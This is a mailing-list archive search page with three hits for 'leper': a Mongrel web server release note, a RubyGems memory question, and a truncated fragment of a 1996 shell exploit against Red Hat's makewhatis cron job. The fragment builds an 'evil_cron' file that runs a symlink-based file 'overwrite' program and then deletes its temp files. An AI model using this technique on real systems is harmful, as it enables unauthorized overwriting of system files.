Displaying 3 results from an estimated 3 matches for "leper".
Did you mean:
leer
2006 Feb 12
16
Mongrel 0.3.1 -- New Site/Runs Right
Hello All,
Yet another release of Mongrel proudly pushed out for everyone to review and
comment on. This time though, I''ve done up a little website that''s *way*
better than the plan Rdoc that used to stand in for the site like a
one-legged leper.
* http://mongrel.rubyforge.net/
As you should already know, Mongrel is a fast HTTP server and library for
Ruby partially written in C. It supports running Ruby on Rails, Camping,
and Og+Nitro applications as well as featuring a simple API for others to
use in their own frameworks. Performance...
1996 Dec 24
0
Linux Redhat 4.0/3.0.3 makewhatis cron job
...nd try IP spoofing in from ''cat'' as user ''(1)'' <smirk>
#
# Dave G.
# <daveg@escape.com>
# http://www.escape.com/~daveg
# 12/21/96
NUMLINKS=100 # I dont feel like guessing. This will hit it.
# Admittedly, it has as much style as a clumsy leper.
if [ -x /usr/bin/crontab ] ; then
cat << ! > evil_cron
# These are for 3.0.3
19 03 * * 1 $PWD/overwrite $1 $NUMLINKS
00 04 * * 1 /bin/rm -f /tmp/whatis* $PWD/overwrite
# These are for 4.0
00 02 * * 0 $PWD/overwrite $1 $NUMLINKS
00 03 * * 0 /bin/rm -f /tmp/whatis* $PWD/overwrite
!...
2006 Aug 08
5
RubyGems runtime memory use in Rails apps...
This an open plea for someone with knowledge of RubyGems to explain why
RubyGems stays in memory (over 10MB) after a Rails application is loaded. I
am unable to figure out why this would be necessary. I haven''t had any
response from Jim or Chad from RubyGems about it so I thought I would throw
it open to the list to see if anyone could educate me or share thier
experiences with this.